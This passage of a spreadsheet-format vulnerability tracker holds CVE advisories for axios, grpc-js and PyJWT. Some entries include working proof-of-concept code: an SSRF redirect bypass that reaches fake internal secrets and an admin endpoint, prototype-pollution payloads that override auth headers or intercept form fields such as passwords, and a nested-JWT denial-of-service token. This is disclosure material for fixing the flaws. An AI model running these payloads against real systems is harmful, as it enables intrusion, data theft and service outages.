  console.log('POC RESULT: HTTP adapter did not block redirect -- unexpected, check axios version.');
} else {
  console.log('POC RESULT: fetch adapter blocked redirect -- issue may be fixed.');
}
serverA.close();
serverB.close();
```
Run:
```bash
node poc-max-redirects.mjs
```
Observed:
```text
Axios maxRedirects bypass via fetch adapter PoC
axios VERSION=1.17.0
maxRedirects=0
Target URL=http://127.0.0.1:13801/api/data
  redirects to http://127.0.0.1:13802/internal/secrets
Change URL=http://127.0.0.1:13801/api/change-config
  redirects to http://127.0.0.1:13802/internal/admin/config
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗
           Response: {"secret":"FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY","role":"arn:aws:iam::000000000000:role/FakeProductionRole"}
[BYPASS]   Internal hits after fetch adapter: 1
[BYPASS]   Fetch adapter state change: {"reached":"state-changing internal admin endpoint","changed":true,"internalConfig":{"compromised":true,"source":"redirect-followed-by-fetch-adapter"}}
[BYPASS]   Internal hits after state change: 2
POC RESULT: fetch adapter followed redirects despite maxRedirects:0,
            reaching internal service and mutating internal state.
```
## Control
Axios does correctly enforce `maxRedirects: 0` in the HTTP adapter. The `[CONTROL]` case above confirms this: the same request with `adapter: 'http'` throws rather than following the redirect, and the internal hit counter stays at `0`:
```text
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
```
The issue is not that `maxRedirects` is broken globally. It is enforced correctly for the HTTP adapter. The bypass is specific to the fetch adapter, which never reads the option and passes no `redirect` constraint to the underlying `fetch()` call.
## Impact
This is a redirect enforcement bypass affecting axios applications running in environments where the fetch adapter is active.
The internal admin route in the PoC simulates an affected deployment where a redirected request can reach state-changing internal APIs. The vulnerability is that `maxRedirects: 0` is silently ignored by the fetch adapter; the exact impact depends on what redirect targets are reachable from the runtime.
The impact is environment- and configuration-dependent. It affects axios users who:
- Set `maxRedirects: 0` as a defense against redirect-based SSRF, and
- Run in an environment where the fetch adapter is selected, either by runtime (Deno, Bun, Cloudflare Workers) or by explicit configuration
In these cases, a `302` redirect from the initial target is followed silently by default, unless the caller separately sets `fetchOptions.redirect`. If the redirect target is an internal service, the application returns its response to the caller with no indication that a redirect occurred or that `maxRedirects` was not honoured. The failure is silent: no error is thrown, no warning is logged.
The bypass is not limited to read-only access. As demonstrated by the second bypass case, a redirect to a state-changing internal endpoint succeeds equally. An attacker who can influence the redirect destination, for example through an open redirect on the initial target or a server they control, can reach internal and trigger mutations that the application never intended to issue.
Potentially affected environments include:
- Deno and Bun applications using axios where the fetch adapter is the default.
- Cloudflare Workers using axios, which has no Node.js `http` module.
- Node.js applications that explicitly configure `adapter: 'fetch'` or a custom adapter list that resolves to fetch.
- Any application that conditionally sets `maxRedirects: 0` and runs across multiple environments with different adapter selection.
Internal services reachable via a redirect include cloud instance metadata endpoints (`169.254.169.254`), unauthenticated local services such as Redis or internal admin APIs, and other hosts accessible from the application's network that are not intended to be reachable by the caller. The hit counter in the PoC makes the access concrete: `0` after the HTTP control, `1` after the confidentiality bypass, `2` after the integrity bypass.
This should not be characterised as an unconditional SSRF. The bypass requires either an open redirect on the initial target, or a URL that is itself a redirect. The issue is that `maxRedirects: 0`, which is the intended mitigation for this class of attack, is silently non-functional in the fetch adapter, leaving applications with a false sense of protection.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101908</t>
        </is>
      </c>
      <c r="D184" s="5" t="inlineStr"/>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M184" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr"/>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios fetch adapter requests can be altered by inherited properties on `fetchOptions`. The adapter resolves method, headers, body, signal, and credentials into `resolvedOptions`, creates a `Request`, and then calls `fetch(request, fetchOptions)` instead of `fetch(request, resolvedOptions)`. In runtimes such as Node's undici-backed fetch, inherited `fetchOptions.headers` can override the headers already placed on the `Request`.
Axios does not create the prototype pollution source. This is a read-side gadget that becomes exploitable after same-process prototype pollution.
## Impact
An attacker with a prior prototype-pollution primitive can cause affected fetch-adapter requests to send attacker-controlled headers and drop caller-specified headers. This can affect authorization, cache behavior, metadata-service interactions, or application-specific header-based controls.
The issue is specific to fetch-adapter behavior and does not affect Node HTTP adapter requests.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where the fetch adapter is selected.
- Requests where `fetchOptions` is an object that does not have safe own values for sensitive fetch init fields.
Not affected:
- Node HTTP adapter.
- Requests that do not use the fetch adapter.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/adapters/fetch.js` builds:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
request = isRequestSupported &amp;&amp; new Request(url, resolvedOptions);
let response = await (isRequestSupported
  ? _fetch(request, fetchOptions)
  : _fetch(url, resolvedOptions));
```
The fallback path without `Request` uses `resolvedOptions`, but the `Request` path passes the original `fetchOptions` as the second argument to `fetch()`. That second argument can contain inherited properties from `Object.prototype`.
Local verification on axios `1.18.1` set `Object.prototype.headers = { Authorization: 'Bearer POLLUTED' }` and called the fetch adapter with `headers: { 'X-Good': 'yes' }, fetchOptions: {}`. The loopback server received `Authorization: Bearer POLLUTED` and did not receive `X-Good`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { Authorization: 'Bearer POLLUTED' };
try {
  await axios.get(url, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
} finally {
  delete Object.prototype.headers;
}
```
Expected safe behavior is that the sanitized axios headers remain in force. Current behavior can use the inherited fetch init headers instead.
## Workarounds
Use the Node HTTP adapter for security-sensitive server-side requests until fixed. If the fetch adapter must be used, avoid passing empty `fetchOptions` objects in processes where prototype pollution is possible, and set explicit safe own values for fetch init fields.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hello, I’m not completely sure if this is something you’d consider a security issue, since it depends on prototype pollution happening somewhere else first, but I wanted to report it just in case.
I was testing the fetch adapter with polluted prototype values and found that `Object.prototype.headers` can change the request axios sends.
The issue seems to be in `lib/adapters/fetch.js`. Axios creates a `Request` with the resolved headers/method/body, but then sends it with `fetch(request, fetchOptions)`. With undici, if `fetchOptions` doesn’t have its own headers, an inherited `Object.prototype.headers` value can be used during the final fetch call.
I tested it with this:
```js
import http from 'node:http';
import axios from 'axios';
const server = http.createServer((req, res) =&gt; {
  res.end(JSON.stringify({
    authorization: req.headers.authorization || null,
    xGood: req.headers['x-good'] || null
  }));
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
const { port } = server.address();
Object.prototype.headers = {
  Authorization: 'Bearer POLLUTED'
};
try {
  const res = await axios.get(`http://127.0.0.1:${port}/`, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
  console.log(res.data);
} finally {
  delete Object.prototype.headers;
  server.close();
}
```
The result I get is:
```json
{
  "authorization": "Bearer POLLUTED",
  "xGood": null
}
```
So the polluted Authorization header is sent, and the normal axios header is not.
Changing the fetch call to pass the already resolved options fixes it for me:
```diff
- _fetch(request, fetchOptions)
+ _fetch(request, resolvedOptions)
```
`resolvedOptions` already includes `...fetchOptions`, so custom fetch options should still work, while headers, method, body, and signal stay as clean own values.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101908</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D185" s="5" t="inlineStr"/>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M185" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr"/>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios form serialization reads `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob` from an internal options object without own-property guards. When `Object.prototype` has been polluted elsewhere in the same process, those inherited values can change how axios serializes multipart and URL-encoded request bodies.
Axios does not create the prototype pollution source. This is a read-side gadget: axios turns an existing same-process pollution condition into altered request serialization or request failures.
## Impact
The impact depends on which property is polluted and which axios serialization path the application uses.
Polluted `dots`, `indexes`, or `metaTokens` can change field names and cause the receiving service to parse different data than the caller intended. Polluted `maxDepth` can cause nested form submissions to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`, producing request-level or service-level denial of service for affected workflows. Polluted `visitor` can execute as the serializer visitor if an attacker can place a function on `Object.prototype`, but that condition generally implies a stronger same-process code-execution or malicious-dependency primitive and should be described carefully.
## Affected Functionality
Affected:
- `axios.toFormData()`.
- `transformRequest` paths that serialize plain objects to `multipart/form-data`.
- URL-encoded form serialization paths that rely on the same helper.
- `formSerializer` option defaults when the relevant properties are absent as own properties.
Not affected:
- JSON request bodies.
- Requests that do not invoke `toFormData()`.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/helpers/toFormData.js` merges caller options with defaults using `utils.toFlatObject()`. When `options` is `undefined`, `toFlatObject()` returns the default object unchanged:
```js
{
  metaTokens: true,
  dots: false,
  indexes: false
}
```
That default object has `Object.prototype` in its prototype chain. `toFormData()` then reads behavior-affecting values directly:
```js
const metaTokens = options.metaTokens;
const visitor = options.visitor || defaultVisitor;
const dots = options.dots;
const indexes = options.indexes;
const _Blob = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);
const maxDepth = options.maxDepth === undefined ? DEFAULT_FORM_DATA_MAX_DEPTH : options.maxDepth;
```
These reads can resolve inherited polluted properties.
Local code review confirmed the direct reads in `v1.18.1`. Tag checks show the option-based form serializer exists in `v0.28.0` and later; `maxDepth` appears in the `1.x` line from the form recursion fix.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.maxDepth = 1;
await axios.post(url, { a: { b: { c: 'value' } } }, {
  headers: { 'Content-Type': 'multipart/form-data' }
});
```
Expected safe behavior is that the default max depth is used unless the caller sets an own `formSerializer.maxDepth`. Current behavior reads the inherited value and can throw `ERR_FORM_DATA_DEPTH_EXCEEDED`.
For serializer alteration, polluting `Object.prototype.dots = true` changes nested field naming from bracket notation to dot notation when the caller did not opt into that behavior.
## Workarounds
Avoid serializing attacker-controlled objects as form data in a process with known prototype pollution. As a partial mitigation, callers can pass an own `formSerializer` object that sets explicit safe values for all relevant keys, including `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
_axios v1.18.1 contains a read-side prototype pollution gadget in its form data serialization logic. Six option properties (`visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, `Blob`) are read from a plain JavaScript object that inherits from `Object.prototype` without `hasOwnProperty` guards. When `Object.prototype` has been polluted elsewhere in the process a common consequence of compromised transitive npm dependencies, these polluted values silently control axios' form serialization behavior._
_The highest-impact gadget is `visitor`: a polluted function on `Object.prototype.visitor` is invoked for every key-value pair during multipart and URL-encoded form serialization, receiving the value, key, path, and internal helper functions as arguments._
### Details
#### Root Cause
_The attack chain has three steps:_
_**Step 1:  `formSerializer` is read safely, but `undefined` flows through**_
_In `lib/defaults/index.js`, the default `transformRequest` function reads `formSerializer` from config using the `own()` helper, which enforces `hasOwnProp`:_
```js
const formSerializer = own(this, 'formSerializer');
```
_When the user does not explicitly configure `formSerializer`, this correctly returns `undefined`. That `undefined` is then passed as the `options` parameter to `toFormData()`:_
```js
return toFormData(data, _FormData &amp;&amp; new _FormData(), formSerializer);
//                                                     ^^^^^^^^^^^^ undefined
```
_**Step 2: `toFlatObject` returns a plain-object default**_
_Inside `lib/helpers/toFormData.js`, `options` (which is `undefined`) is merged with defaults via `utils.toFlatObject()`:_
```js
options = utils.toFlatObject(
    options,                                    // undefined
    { metaTokens: true, dots: false, indexes: false },  // plain object literal
    false,
    function defined(option, source) {
        return !utils.isUndefined(source[option]);
    }
);
```
_`toFlatObject` has an early-return for null/undefined sources:_
```js
// lib/utils.js:607
if (sourceObj == null) return destObj;
```
_Since `options` is `undefined`, the function returns `destObj` unchanged — the plain object `{ metaTokens: true, dots: false, indexes: false }`. This object's prototype is `Object.prototype`._
_**Step 3: Options are read without `hasOwnProp` guards**_
_The six option properties are read directly from the plain object:_
```js
const metaTokens = options.metaTokens;                                          // line 117
const visitor    = options.visitor || defaultVisitor;                            // line 119
const dots       = options.dots;                                                // line 120
const indexes    = options.indexes;                                             // line 121
const _Blob      = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);       // line 122
const maxDepth   = options.maxDepth === undefined                                // line 123
                     ? DEFAULT_FORM_DATA_MAX_DEPTH
                     : options.maxDepth;
```
_None of these reads use `utils.hasOwnProp()`. Since the `options` object inherits from `Object.prototype`, any property set on `Object.prototype` by a compromised dependency is resolved through the prototype chain._
#### Why the Existing Defenses Didn't Catch This
_axios has extensive prototype pollution defenses. However, those defenses are all focused on the **config** object (created by `mergeConfig`, which returns `Object.create(null)`). The `toFormData` function creates its own internal options object that sits outside that boundary, and the 6 reads on that internal object were never audited._
### PoC
#### Reproduction Steps
#### Environment
_Any environment with Node.js and npm. Tested on:_
_- Node.js v24.15.0, npm 11.13.0_
_- axios v1.18.1 (latest release at time of writing)_
##### Step 1: Create a fresh project
```bash
mkdir axios-pp-poc
cd axios-pp-poc
npm init -y
npm install axios@1.18.1
```
##### Step 2: Create the PoC file
_Create `poc.mjs` with the following content:_
```js
import axios from 'axios';
import http from 'http';
// Simulate pollution from a compromised transitive dependency
let stolen = [];
Object.prototype.visitor = function(value, key, path, helpers) {
    stolen.push({ key, value });
    return helpers.defaultVisitor.call(this, value, key, path);
};
Object.prototype.maxDepth = 2;
const server = http.createServer((req, res) =&gt; {
    res.writeHead(200);
    res.end('{}');
});
server.listen(0, '127.0.0.1', async () =&gt; {
    const { port } = server.address();
    try {
        // Exfiltration: visitor intercepts all form fields
        await axios.post(`http://127.0.0.1:${port}/`, {
            username: 'john',
            password: 'SuperSecret123!',
            profile: { ssn: '123-45-6789' }
        }, { headers: { 'Content-Type': 'multipart/form-data' } });
        console.log('Stolen:', stolen);
        // Stolen: [
        //   { key: 'username', value: 'john' },
        //   { key: 'password', value: 'SuperSecret123!' },
        //   { key: 'profile',  value: { ssn: '123-45-6789' } },
        //   { key: 'ssn',      value: '123-45-6789' }
        // ]
        // DoS: nested object rejected by polluted maxDepth
        await axios.post(`http://127.0.0.1:${port}/`,
            { a: { b: { c: { d: 'value' } } } },
            { headers: { 'Content-Type': 'multipart/form-data' } }
        );
        // Throws: ERR_FORM_DATA_DEPTH_EXCEEDED
        //   "Object is too deeply nested (3 levels). Max depth: 2"
    } finally {
        delete Object.prototype.visitor;
        delete Object.prototype.maxDepth;
        server.close();
    }
});
```
##### Step 3: Run the PoC
```bash
node poc.mjs
```
### Impact
#### 1. Data Exfiltration via `visitor` (Confidentiality: High)
_A polluted `Object.prototype.visitor` function is called as the form data visitor:_
```js
visitor.call(formData, el, key, path, exposedHelpers)
```
_The attacker receives:_
_- **`value`** — the raw value being serialized (passwords, tokens, PII, API keys)_
_- **`key`** — the field name_
_- **`path`** — the full path array (e.g., `['profile', 'address', 'street']`)_
_- **`exposedHelpers`** — internal helpers including `defaultVisitor`, `convertValue`, `isVisitable`_
_By delegating to `helpers.defaultVisitor`, the attack is completely transparent, the request succeeds normally and the server receives intact data. The exfiltration is invisible to both the caller and the server._
#### 2. Denial of Service via `maxDepth` (Availability: Low)
_A polluted `Object.prototype.maxDepth` of `1` or `2` causes any moderately nested form data request to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`. Applications that send nested objects as form data (common with APIs that accept `profile[name]`, `address[city]`, etc.) will experience mysterious failures._
#### 3. Data Corruption via `dots`, `indexes`, `metaTokens` (Integrity: Low)
_Polluting these options changes the serialization format of form field names:_
_- **`dots: true`** — changes bracket notation (`user[name]`) to dot notation (`user.name`)_
_- **`indexes: true`** — changes array serialization (`items[]`) to indexed (`items[0]`, `items[1]`)_
_- **`metaTokens: false`** — changes `obj{}` keys to raw json strings_
_The server may misinterpret the submitted form data, leading to silent data corruption._
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101915</t>
        </is>
      </c>
      <c r="D186" s="5" t="inlineStr"/>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M186" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr"/>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>### Impact
If an application method handler crashes, the error message is included in the status message sent to the client. This can leak to the client any sensitive data that may be included in the error message. This impacts anyone using `@grpc/grpc-js` to run servers.
### Patches
This vulnerability is fixed in 1.13.6 and 1.14.5.
### Workarounds
This can be avoided by using a top-level error handler in method handlers to strip out sensitive error information.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101915</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D187" s="5" t="inlineStr"/>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M187" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr"/>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>### Impact
When server credentials are created with the `requireClientCertificate` option set to `false`, `getAuthContext` does not distinguish between authorized and unauthorized certificates in its return value. This can create improper authentication vulnerabilities for `@grpc/grpc-js` users who use the result of `getAuthContext` for authentication.
In particular, `@grpc/grpc-js-xds` can both set the `requireClientCertificate` option to `false` and use the return value of `getAuthContext` for RBAC authentication in some configurations.
### Patches
This vulenrability is fixed in 1.13.6 and 1.14.5.
### Workarounds
`@grpc/grpc-js` users using `getAuthContext` this way can avoid this problem by setting `requireClientCertificate` to `true`. `@grpc/grpc-js-xds` users using RBAC can avoid this by setting the `require_client_certificate` field to `true` in the DownstreamTlsContext in the xDS configuration.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101918</t>
        </is>
      </c>
      <c r="D188" s="5" t="inlineStr"/>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M188" s="5" t="inlineStr">
        <is>
          <t>2.15.0</t>
        </is>
      </c>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr"/>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>## Summary
`PyJWKClient.get_signing_key_from_jwt(token)` — the first step of the JWKS
verification flow documented in `docs/usage.rst` — must decode a token's
payload before its signature can be checked, via
`jwt.api_jwt.decode_complete(token, options={"verify_signature": False})`.
That call parses the payload with `json.loads` in `PyJWT._decode_payload`
(`jwt/api_jwt.py:297-300`), whose `except` clause catches only `ValueError`.
A payload that is valid JSON but nested ~20,000 levels deep makes
`json.loads` raise `RecursionError`, which is **not** a `ValueError` and
escapes as a raw, undocumented exception type — not `DecodeError`,
`InvalidTokenError`, or `PyJWTError`, so every documented error-handling
pattern in `docs/usage.rst` misses it.
The token needs no valid signature and no network access — the crash
happens during payload parsing, before the `kid` is even looked up. A
single unauthenticated ~50KB request crashes the caller's auth handler
(HTTP 500 / dead worker), repeatably. The same path is reachable through
plain `jwt.decode(token, options={"verify_signature": False})` too.
Notably, this project already fixed the **identical** bug class for the
JWS **header** path — `PyJWS._load` catches `(ValueError, RecursionError)`
and wraps it in `DecodeError` (`jwt/api_jws.py:360-361`), and
`CHANGELOG.rst` (v2.14.0, "Security") states "Handle deeply nested and
malformed JWS/JWK input without uncaught recursion errors." The payload
path — the one part of a forged token an unauthenticated attacker fully
controls — was left catching `ValueError` alone, so that security fix does
not fully hold.
A second, related instance: `PyJWKClient.fetch_data` (`jwt/jwks_client.py:168`)
parses a JWKS endpoint's response with `json.load(response)` inside a
`try` that only catches `(URLError, TimeoutError, http.client.HTTPException)`
— a deeply-nested JSON response from a JWKS endpoint raises the same raw
`RecursionError`, uncaught entirely (worse than the payload path, which at
least caught plain `ValueError`).
**Affected versions:** confirmed present in the current release, 2.14.0,
and on the current `master` branch (commit `4adcd02722f5011c60079d3978dfc167b9a8eaa5`).
## Reproduction
```python
import base64, json, jwt
def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=")
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(b"[" * 20_000 + b"]" * 20_000)
token = (header + b"." + payload + b"." + b64url(b"forged-sig")).decode()
jwt.decode(token, options={"verify_signature": False})
# raises: RecursionError (not DecodeError/InvalidTokenError/PyJWTError)
```
Control: the same deeply-nested structure moved into the token's **header**
instead of its payload is correctly converted to `jwt.DecodeError` by the
already-hardened `jwt/api_jws.py:360` — confirming the payload path is
specifically the missed half of the v2.14.0 hardening, not a general gap.
## Impact assessment
Unauthenticated denial-of-service via unhandled exception on an auth path.
Not an auth bypass — rated medium. With signature verification enabled,
this parse runs after `_verify_signature`, so only the pre-verification
paths (`get_signing_key_from_jwt`, explicit `verify_signature=False`) are
attacker-reachable pre-auth; the JWKS-endpoint variant requires control of
(or a MITM on) the configured JWKS endpoint rather than being reachable
from an arbitrary client token.
## Suggested fix
In `jwt/api_jwt.py:299`, change `except ValueError as e:` to
`except (ValueError, RecursionError) as e:`, mirroring
`jwt/api_jws.py:360` exactly. In `jwt/jwks_client.py`, add the same
`(ValueError, RecursionError)` handling around `json.load(response)` in
`fetch_data`, raising `PyJWKClientError` (consistent with the method's
existing documented error contract). A patch implementing both, verified
against the full test suite (457 passed, 4 skipped — pre-existing,
environment-related) and against the reproduction above (now correctly
raises `DecodeError`), is attached (`fix.patch`).
## Discovery method
Found and verified using `scopegrep` (https://github.com/not-ekalabya/scopegrep)
— a semantic code-retrieval tool that surfaces every other call site of a
symbol alongside relevance-ranked results, which is what surfaced the
already-hardened header path as the direct comparison here — paired with
an LLM coding agent (GLM-5.3) run as an open-ended security review of this
repository. Independently reproduced against the exact commit above before
this report was written. Happy to share the full session transcript on
request.
## Disclosure status
Not shared with any other party or published. Submitting through this
private channel per the project's stated security policy; no planned
public/conference disclosure ahead of a coordinated timeline.
---
## Maintainer triage update (2026-09-22)
### Confirmed finding and scope
We confirmed that an attacker-controlled recursively nested JWT payload can cause a raw Python `RecursionError` to escape PyJWT at PyJWT 2.14.0 and the tested current source. The confirmed in-scope paths are direct decoding with `verify_signature=False` and `PyJWKClient.get_signing_key_from_jwt`, where payload parsing occurs before key lookup.
The demonstrated impact is limited to an uncaught exception for the affected call, which may surface as an application HTTP 500 when the application does not catch it. Testing did not demonstrate a worker or process crash, persistent resource exhaustion, resource amplification, authentication bypass, or confidentiality or integrity impact.
The separate JWKS-response subclaim is out of scope under the policy boundary that requires the application to trust its configured JWKS source and transport. The confirmed payload finding is not a duplicate of the earlier protected-header parser finding: it occurs in a distinct payload parsing path that remained affected after the earlier header-only fix.
### Version and remediation status
